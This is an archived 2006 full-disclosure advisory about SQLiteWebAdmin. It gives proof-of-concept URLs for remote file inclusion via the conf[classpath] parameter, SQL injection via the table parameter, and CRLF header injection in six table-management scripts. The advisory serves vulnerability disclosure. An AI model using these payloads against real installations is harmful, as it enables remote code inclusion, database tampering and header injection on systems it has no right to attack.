Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13720
HistoryAug 02, 2006 - 12:00 a.m.

[Full-disclosure] SQLiteWebAdmin multiple Vulnerabilities

2006-08-0200:00:00
vulners.com
12

Discovered by Sirdarckcat from elhacker.net

SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin

SQLiteWebAdmin is a simple script for managing a
DataBase.

It has several security bugs.

==============================================
Remote File Inclusion:

PoC:
http://www.server.com/lib/tpl.inc.php?conf[classpath]=http://www.google.com/?

==============================================

SQLinjection:

PoC:
http://www.server.com/table_editfield.php?table='+[SQL]

==============================================

And also Header Injection:

PoC:
http://www.server.com/table_editfield.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/table_dropindex.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/table_dropfield.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/table_addindex.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/table_addfield.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/database_addtable.php?table=%0D%0AHeader1:+value

==============================================

Att.
Sirdarckcat
elhacker.net